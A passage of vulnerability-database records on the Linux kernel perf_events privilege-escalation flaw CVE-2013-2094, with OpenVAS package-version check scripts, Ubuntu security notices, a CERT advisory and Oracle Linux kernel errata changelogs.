exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-generic\", ver:\"3.5.0-30.51~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:1361412562310841424", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841424", "type": "openvas", "title": "Ubuntu Update for linux USN-1826-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1826_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1826-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841424\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:33 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1826-1\");\n\n script_xref(name:\"USN\", value:\"1826-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1826-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"A flaw was discovered in the Linux kernel's perf_events interface. 
A local\n user could exploit this flaw to escalate privileges on the system.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-generic\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-highbank\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-omap\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-powerpc-smp\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-30-powerpc64-smp\", ver:\"3.5.0-30.51\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:21:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2094"], "description": "Check for the Version of linux", "modified": "2017-12-01T00:00:00", "published": "2013-05-17T00:00:00", "id": "OPENVAS:841423", "href": "http://plugins.openvas.org/nasl.php?oid=841423", "type": "openvas", "title": "Ubuntu Update for linux USN-1825-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1825_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for 
linux USN-1825-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"linux on Ubuntu 12.04 LTS\";\ntag_insight = \"A flaw was discovered in the Linux kernel's perf_events interface. 
A local\n user could exploit this flaw to escalate privileges on the system.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\nif(description)\n{\n script_id(841423);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-05-17 09:54:30 +0530 (Fri, 17 May 2013)\");\n script_cve_id(\"CVE-2013-2094\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1825-1\");\n\n script_xref(name: \"USN\", value: \"1825-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1825-1/\");\n script_summary(\"Check for the Version of linux\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-generic\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-generic-pae\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-highbank\", 
ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-omap\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-powerpc-smp\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-powerpc64-smp\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-43-virtual\", ver:\"3.2.0-43.68\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-18T01:46:16", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "A flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 6, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1825-1", "href": "https://ubuntu.com/security/notices/USN-1825-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:31:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "A flaw was discovered in the Linux kernel's perf_events interface. 
A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 5, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1826-1", "href": "https://ubuntu.com/security/notices/USN-1826-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:33:37", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "A flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 5, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1827-1", "href": "https://ubuntu.com/security/notices/USN-1827-1", "title": "Linux kernel vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "A flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system.", "edition": 6, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "USN-1828-1", "href": "https://ubuntu.com/security/notices/USN-1828-1", "title": "Linux kernel (Quantal HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T23:38:30", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3301", "CVE-2013-1929", "CVE-2013-2094"], "description": "A flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. \n(CVE-2013-2094)\n\nA buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet \ndriver for the Linux kernel. 
A local user could exploit this flaw to cause \na denial of service (crash the system) or potentially escalate privileges \non the system. (CVE-2013-1929)\n\nA flaw was discovered in the Linux kernel's ftrace subsystem interface. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-3301)", "edition": 5, "modified": "2013-05-24T00:00:00", "published": "2013-05-24T00:00:00", "id": "USN-1836-1", "href": "https://ubuntu.com/security/notices/USN-1836-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:31:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3301", "CVE-2013-1929", "CVE-2013-2094"], "description": "A flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. \n(CVE-2013-2094)\n\nA buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet \ndriver for the Linux kernel. A local user could exploit this flaw to cause \na denial of service (crash the system) or potentially escalate privileges \non the system. (CVE-2013-1929)\n\nA flaw was discovered in the Linux kernel's ftrace subsystem interface. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-3301)", "edition": 5, "modified": "2013-05-30T00:00:00", "published": "2013-05-30T00:00:00", "id": "USN-1838-1", "href": "https://ubuntu.com/security/notices/USN-1838-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:54", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2141", "CVE-2013-3301", "CVE-2013-1929", "CVE-2013-1979", "CVE-2013-2094"], "description": "A flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. 
\n(CVE-2013-2094)\n\nAndy Lutomirski discovered an error in the Linux kernel's credential handling \non unix sockets. A local user could exploit this flaw to gain \nadministrative privileges. (CVE-2013-1979)\n\nA buffer overflow vulnerability was discovered in the Broadcom tg3 ethernet \ndriver for the Linux kernel. A local user could exploit this flaw to cause \na denial of service (crash the system) or potentially escalate privileges \non the system. (CVE-2013-1929)\n\nAn information leak was discovered in the Linux kernel's tkill and tgkill \nsystem calls when used from compat processes. A local user could exploit \nthis flaw to examine potentially sensitive kernel memory. (CVE-2013-2141)\n\nA flaw was discovered in the Linux kernel's ftrace subsystem interface. A \nlocal user could exploit this flaw to cause a denial of service (system \ncrash). (CVE-2013-3301)", "edition": 5, "modified": "2013-05-28T00:00:00", "published": "2013-05-28T00:00:00", "id": "USN-1839-1", "href": "https://ubuntu.com/security/notices/USN-1839-1", "title": "Linux kernel (OMAP4) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:41:48", "bulletinFamily": "unix", "cvelist": ["CVE-2013-3228", "CVE-2013-3230", "CVE-2013-2141", "CVE-2013-3232", "CVE-2013-3231", "CVE-2013-3229", "CVE-2013-3224", "CVE-2013-3234", "CVE-2013-3233", "CVE-2013-3227", "CVE-2013-3225", "CVE-2013-2850", "CVE-2013-3222", "CVE-2013-2146", "CVE-2013-3076", "CVE-2013-3226", "CVE-2013-2094", "CVE-2013-3235", "CVE-2013-3223"], "description": "Kees Cook discovered a flaw in the Linux kernel's iSCSI subsystem. A remote \nunauthenticated attacker could exploit this flaw to cause a denial of \nservice (system crash) or potentially gain administrative privileges. \n(CVE-2013-2850)\n\nA flaw was discovered in the Linux kernel's perf_events interface. A local \nuser could exploit this flaw to escalate privileges on the system. 
\n(CVE-2013-2094)\n\nAn information leak was discovered in the Linux kernel's tkill and tgkill \nsystem calls when used from compat processes. A local user could exploit \nthis flaw to examine potentially sensitive kernel memory. (CVE-2013-2141)\n\nA flaw was discovered in the Linux kernel's perf events subsystem for Intel \nSandy Bridge and Ivy Bridge processors. A local user could exploit this \nflaw to cause a denial of service (system crash). (CVE-2013-2146)\n\nAn information leak was discovered in the Linux kernel's crypto API. A \nlocal user could exploit this flaw to examine potentially sensitive \ninformation from the kernel's stack memory. (CVE-2013-3076)\n\nAn information leak was discovered in the Linux kernel's rcvmsg path for \nATM (Asynchronous Transfer Mode). A local user could exploit this flaw to \nexamine potentially sensitive information from the kernel's stack memory. \n(CVE-2013-3222)\n\nAn information leak was discovered in the Linux kernel's recvmsg path for \nax25 address family. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3223)\n\nAn information leak was discovered in the Linux kernel's recvmsg path for \nthe bluetooth address family. A local user could exploit this flaw to \nexamine potentially sensitive information from the kernel's stack memory. \n(CVE-2013-3224)\n\nAn information leak was discovered in the Linux kernel's bluetooth rfcomm \nprotocol support. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3225)\n\nAn information leak was discovered in the Linux kernel's bluetooth SCO \nsockets implementation. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3226)\n\nAn information leak was discovered in the Linux kernel's CAIF protocol \nimplementation. 
A local user could exploit this flaw to examine potentially \nsensitive information from the kernel's stack memory. (CVE-2013-3227)\n\nAn information leak was discovered in the Linux kernel's IRDA (infrared) \nsupport subsystem. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3228)\n\nAn information leak was discovered in the Linux kernel's s390 - z/VM \nsupport. A local user could exploit this flaw to examine potentially \nsensitive information from the kernel's stack memory. (CVE-2013-3229)\n\nAn information leak was discovered in the Linux kernel's l2tp (Layer Two \nTunneling Protocol) implementation. A local user could exploit this flaw to \nexamine potentially sensitive information from the kernel's stack memory. \n(CVE-2013-3230)\n\nAn information leak was discovered in the Linux kernel's llc (Logical Link \nLayer 2) support. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3231)\n\nAn information leak was discovered in the Linux kernel's receive message \nhandling for the netrom address family. A local user could exploit this \nflaw to obtain sensitive information from the kernel's stack memory. \n(CVE-2013-3232)\n\nAn information leak was discovered in the Linux kernel's nfc (near field \ncommunication) support. A local user could exploit this flaw to examine \npotentially sensitive information from the kernel's stack memory. \n(CVE-2013-3233)\n\nAn information leak was discovered in the Linux kernel's Rose X.25 protocol \nlayer. A local user could exploit this flaw to examine potentially \nsensitive information from the kernel's stack memory. (CVE-2013-3234)\n\nAn information leak was discovered in the Linux kernel's TIPC (Transparent \nInter Process Communication) protocol implementation. 
A local user could \nexploit this flaw to examine potentially sensitive information from the \nkernel's stack memory. (CVE-2013-3235)", "edition": 6, "modified": "2013-05-31T00:00:00", "published": "2013-05-31T00:00:00", "id": "USN-1849-1", "href": "https://ubuntu.com/security/notices/USN-1849-1", "title": "Linux kernel (Raring HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:48", "bulletinFamily": "info", "cvelist": ["CVE-2013-2094"], "description": "### Overview \n\nThe Linux kernel's Performance Events implementation is susceptible to an out-of-bounds array vulnerability that may be used by a local unprivileged user to escalate privileges.\n\n### Description \n\nThe Linux kernel's Performance Events implementation is susceptible to an out-of-bounds array vulnerability that may be used by a local unprivileged user to escalate privileges. Additional analysis of the vulnerability may be found in the [Red Hat bug report](<https://bugzilla.redhat.com/show_bug.cgi?id=962792>). A public exploit is available that has been reported to work against some Linux distributions. \n \n--- \n \n### Impact \n\nA local authenticated user may be able to exploit this vulnerability to escalate privileges. \n \n--- \n \n### Solution \n\n**Apply an Update**\n\n[Red Hat](<https://rhn.redhat.com/errata/RHSA-2013-0830.html>), [Debian](<http://www.debian.org/security/2013/dsa-2669>), [CentOS](<http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html>), and [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-2094.html>) have all released patches. Users should receive the patches through their Linux distributions' normal update process. 
\n \n_Affected Distributions_\n\n * Red Hat Enterprise Linux 6 & Red Hat Enterprise MRG 2\n * CentOS 6\n * Debian 7.0 (Wheezy)\n * Ubuntu 12.04 LTS, 12.10, 13.04\nOther distributions may be affected but were not confirmed at the time of publication. \n--- \n \nIf you are unable to upgrade, please consider the following workaround. \n \nRed Hat has provided mitigation advice in [Red Hat Knowledge Solution 373743](<https://access.redhat.com/site/solutions/373743>). \n \n--- \n \n### Vendor Information\n\n774103\n\n### CentOS Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019729.html>\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html>\n\n### Debian GNU/Linux Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.debian.org/security/2013/dsa-2669>\n\n### Red Hat, Inc. 
Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962792>\n * <https://rhn.redhat.com/errata/RHSA-2013-0830.html>\n\n### Ubuntu Affected\n\nUpdated: May 17, 2013 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/usn-1825-1/>\n * <http://www.ubuntu.com/usn/usn-1826-1/>\n * <http://www.ubuntu.com/usn/usn-1827-1/>\n * <http://www.ubuntu.com/usn/usn-1828-1/>\n\n### Fedora Project Unknown\n\nUpdated: May 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nUpdated: May 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. 
Unknown\n\nUpdated: May 17, 2013 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.9 | E:ND/RL:OF/RC:C \nEnvironmental | 4.4 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://rhn.redhat.com/errata/RHSA-2013-0830.html>\n * <http://www.debian.org/security/2013/dsa-2669>\n * <http://www.ubuntu.com/usn/usn-1825-1/>\n * <http://www.ubuntu.com/usn/usn-1826-1/>\n * <http://www.ubuntu.com/usn/usn-1827-1/>\n * <http://www.ubuntu.com/usn/usn-1828-1/>\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019729.html>\n * <http://lists.centos.org/pipermail/centos-announce/2013-May/019733.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962792>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962792#c16>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=962799>\n * <http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=b0a873ebbf87bf38bf70b5e39a7cadc96099fa13>\n * <http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/kernel/events/core.c?id=8176cced706b5e5d15887584150764894e94e02f>\n * <http://packetstormsecurity.com/files/121616/semtex.c>\n * <http://lkml.indiana.edu/hypermail/linux/kernel/1304.1/03652.html>\n * <http://www.reddit.com/r/netsec/comments/1eb9iw/sdfucksheeporgs_semtexc_local_linux_root_exploit/c9ykrck>\n\n### Acknowledgements\n\nTommi Rantala discovered this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2013-2094](<http://web.nvd.nist.gov/vuln/detail/CVE-2013-2094>) \n---|--- \n**Date Public:** | 2013-05-14 \n**Date First Published:** | 2013-05-17 \n**Date Last Updated:** | 2013-05-17 16:00 UTC \n**Document Revision:** | 28 \n", "modified": 
"2013-05-17T16:00:00", "published": "2013-05-17T00:00:00", "id": "VU:774103", "href": "https://www.kb.cert.org/vuls/id/774103", "type": "cert", "title": "Linux kernel perf_swevent_enabled array out-of-bound access privilege escalation vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:59", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "[2.6.39-400.24.1]\n- perf: Treat attr.config as u64 in perf_swevent_init() (Tommi Rantala) [Orabug: 16808734] {CVE-2013-2094}", "edition": 4, "modified": "2013-05-15T00:00:00", "published": "2013-05-15T00:00:00", "id": "ELSA-2013-2524", "href": "http://linux.oracle.com/errata/ELSA-2013-2524.html", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:47", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2094"], "description": "[2.6.32-358.6.2]\n- [kernel] perf: fix perf_swevent_enabled array out-of-bound access (Petr Matousek) [962793 962794] {CVE-2013-2094}", "edition": 4, "modified": "2013-05-16T00:00:00", "published": "2013-05-16T00:00:00", "id": "ELSA-2013-0830", "href": "http://linux.oracle.com/errata/ELSA-2013-0830.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:02", "bulletinFamily": "unix", "cvelist": ["CVE-2013-2017", "CVE-2013-1943", "CVE-2013-2094", "CVE-2013-1935"], "description": "[2.6.32-358.11.1]\n- [kernel] perf: fix perf_swevent_enabled array out-of-bound access (Petr Matousek) [962793 962794] {CVE-2013-2094}\n[2.6.32-358.10.1]\n- [scsi] be2iscsi : Fix the NOP-In handling code path (Nikola Pajkovsky) [955504 947550]\n- [scsi] be2iscsi: Fix memory leak in control path of driver (Rob Evers) [955504 947550]\n- [virt] kvm: validate userspace_addr of memslot (Petr Matousek) [950496 950498] 
{CVE-2013-1943}\n- [virt] kvm: fix copy to user with irq disabled (Michael S. Tsirkin) [949985 906602] {CVE-2013-1935}\n- [net] veth: Dont kfree_skb() after dev_forward_skb() (Jiri Benc) [957712 957713] {CVE-2013-2017}\n- [net] tcp: Reallocate headroom if it would overflow csum_start (Thomas Graf) [954298 896233]\n- [net] tcp: take care of misalignments (Thomas Graf) [954298 896233]\n- [net] skbuff.c cleanup (Thomas Graf) [954298 896233]\n- [idle] intel_idle: Initialize driver_data correctly in ivb_cstates on IVB processor (Prarit Bhargava) [960864 953630]\n- [x86] Prevent panic in init_memory_mapping() when booting more than 1TB on AMD systems (Larry Woodman) [962482 869736]\n- [mm] enforce mmap_min_addr on x86_64 (Rik van Riel) [961431 790921]\n- [mm] optional next-fit policy for arch_get_unmapped_area (Rik van Riel) [961431 790921]\n- [mm] fix quadratic behaviour in get_unmapped_area_topdown (Rik van Riel) [961431 790921]\n- [scsi] Revert: qla2xxx: Optimize existing port name server query matching (Chad Dupuis) [950529 924804]\n- [scsi] Revert: qla2xxx: Avoid losing any fc ports when loop id's are exhausted (Chad Dupuis) [950529 924804]\n- [fs] defer do_filp_open() access checks to may_open() (Eric Sandeen) [928683 920752]\n- [md] dm thin: bump the target version numbers (Mike Snitzer) [924823 922931]\n- [md] dm-thin: fix discard corruption (Mike Snitzer) [924823 922931]\n- [md] persistent-data: rename node to btree_node (Mike Snitzer) [924823 922931]\n- [md] dm: fix limits initialization when there are no data devices (Mike Snitzer) [923096 908851]\n[2.6.32-358.9.1]\n- [fs] nfs: Fix handling of revoked delegations by setattr (Steve Dickson) [960415 952329]\n- [fs] nfs: Return the delegation if the server returns NFS4ERR_OPENMODE (Steve Dickson) [960415 952329]\n- [fs] nfs: Fix another potential state manager deadlock (Steve Dickson) [960436 950598]\n- [fs] nfs: Fix another open/open_recovery deadlock (Steve Dickson) [960433 916806]\n- [fs] nfs: Hold reference 
to layout hdr in layoutget (Steve Dickson) [960429 916726]\n- [fs] nfs: add 'pnfs_' prefix to get_layout_hdr() and put_layout_hdr() (Steve Dickson) [960429 916726]\n- [fs] nfs: nfs4_open_done first must check that GETATTR decoded a file type (Steve Dickson) [960412 916722]\n- [net] sunrpc: Dont start the retransmission timer when out of socket space (Steve Dickson) [960426 916735]\n- [fs] nfs: Dont use SetPageError in the NFS writeback code (Steve Dickson) [960420 912867]\n- [fs] nfs: Dont decode skipped layoutgets (Steve Dickson) [927294 904025]\n- [fs] nfs: nfs4_proc_layoutget returns void (Steve Dickson) [927294 904025]\n- [fs] nfs: defer release of pages in layoutget (Steve Dickson) [927294 904025]\n- [fs] nfs: Use kcalloc() when allocating arrays (Steve Dickson) [927294 904025]\n- [fs] nfs: Fix an ABBA locking issue with session and state serialisation (Steve Dickson) [960417 912842]\n- [fs] nfs: Fix a race in the pNFS return-on-close code (Steve Dickson) 